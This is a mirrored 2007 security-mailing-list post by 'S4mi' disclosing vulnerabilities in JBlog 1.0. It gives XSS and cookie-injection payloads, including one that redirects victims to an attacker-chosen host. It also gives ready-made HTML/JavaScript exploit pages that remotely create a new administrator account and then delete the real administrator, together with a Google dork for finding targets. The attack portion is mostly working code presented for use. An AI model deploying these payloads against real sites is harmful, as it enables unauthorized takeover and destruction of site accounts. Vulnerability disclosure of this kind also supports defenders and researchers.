The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


JBlog 1.0 Creat Admin exploit, xss, Cookie Manipulation


<< Previous INDEX Search src / Print Next >>
Date: 20 Jul 2007 21:28:53 -0000
From: [email protected]
To: [email protected]
Subject: JBlog 1.0 Creat Admin exploit, xss, Cookie Manipulation
X-Virus-Scanned: antivirus-gw at tyumen.ru

<!--
##############################################################################
#	Script...............: JBlog version: 1.0                            #
#	Script Site..........: http://www.jmuller.net/jblog                  #
#	Vulnerability........: Creat Admin exploit, xss, Cookie Manipulation #
#	Access...............: Remote                                        #
#	level................: Dangerous                                     #
#	Author...............: S4mi                                          #
#	Contact..............: S4mi[at]LinuxMail.org                         #
#                                                                            #
##############################################################################

cookies Manipulation + Cross Site Scripting :

xss: http://site.com/jblog/index.php?id=">[xss Here]&pcomm=com cookies Manipulation: -------------------- The POST variable 'search' in /jblog/recherche.php also The Cookie variable 'theme' is affected and can be set to : <meta http-equiv='Set-cookie' content='name=value'> also we can do this : <meta http-equiv='Set-cookie' content='theme=<body+onload=alert("owned_by_Hacker")>'> or : <meta http-equiv='Set-cookie' content='theme=<body+onload=document.location="http://Bad.site.com/">'> This is a small exemple of Inject Cookie Xploit (Cookie Manipulation) --------------------------------------------------------------------------- <html> <head> <title>Inject Cookie Xploit By S4mi</title> </head> <body> <script language="JavaScript"> function JBlogxpl() { document.xploit.action=document.xploit.victim.value; document.xploit.submit(); } </script> <form name="xploit" method="post" action=""> <input type="hidden" name="victim" value="http://victim/jblog/recherche.php"> <input type="hidden" name="search" value="<meta http-equiv='Set-cookie' content='theme=<body+onload=document.location="http://milw0rm.com/";>'>" /> <script>document.location="javascript: JBlogxpl()"</script> </form> </body> </html>
Remote Privilege Escalation "Creat New Admin Xploit" By S4mi :
--> <html> <title>JBlog 1.0 -- Remote Privilege Escalation (Creat admin sploit) -- By S4mi</title> <body> <script language="JavaScript"> function JBlogxpl() { if (document.xploit.victim.value=="") { alert("Please enter target!"); return false; } { xploit.action="http://"+document.xploit.victim.value+"admin/ajoutaut.php"; xploit.mot.value=document.xploit.mot.value; xploit.droit.value=document.xploit.droit.value; xploit.submit(); } } </script> <strong><p> -------------------------------------------------------------------------------------------<br> #JBlog 1.0 -- Remote Privilege Escalation Xploit (add user)<br> # Discovered By...............: S4mi <br> # Contact..........................: S4mi[at]LinuxMail.org<br> #<br> # Google Dork : "propulsИ par JBlog" <br> --------------------------------------------------------------------------------------------</p> <form name="xploit" method="POST" onSubmit="JBlogxpl();"> Target -> Http:// <input type="text" name="victim" value="www.Site.com/Path/" size="44"> <p> Username.......-> <input type="text" name="mot" value="ZaZ" size="30"> (your password will be by default: <i>"admin"</i>)</p> <p> User type......-> <select name="droit"> <option value="3">Admin</option> <option value="2">Moderator</option> <option value="1">Editor</option> </select> </p> <p>Submit...........-> <input name="submit" type="submit" value=" Xploit it "> </p> </form> <br>---------------------------------------------------------------------------------------<br> #NB : Remember do not use a probably existing username (such as "admin"). <br> #If you want to Delete real admin account :D login into your New Created admin account & use this :<br> --------------------------------------------------------------------------------------------<p> <script language="JavaScript"> function AdminDelete() { if (document.xploit.victim.value=="") { alert("Please enter target!"); return false; } if(confirm('Are you Sure!! want really DELETE user ?')) document.location.href="http://"+document.xploit.victim.value+"admin/supauteur.php?cat="+document.userdel.id.value; } </script> <form name="userdel" method="POST" onSubmit=""> ID...............> <input type="text" name="id" value="1" size="3"> </form> <a href="#" OnClick="AdminDelete()"/>Delete</a> <br>-----------------------------------------------------------------------------------------------<br> #Special Greetz to : Simo64, DrackaNz, Coder212, Iss4m, HarDose, r0_0t, ddx39, Black-Code, Nuck3r... & all who know Me! </body> </html>

<< Previous INDEX Search src / Print Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру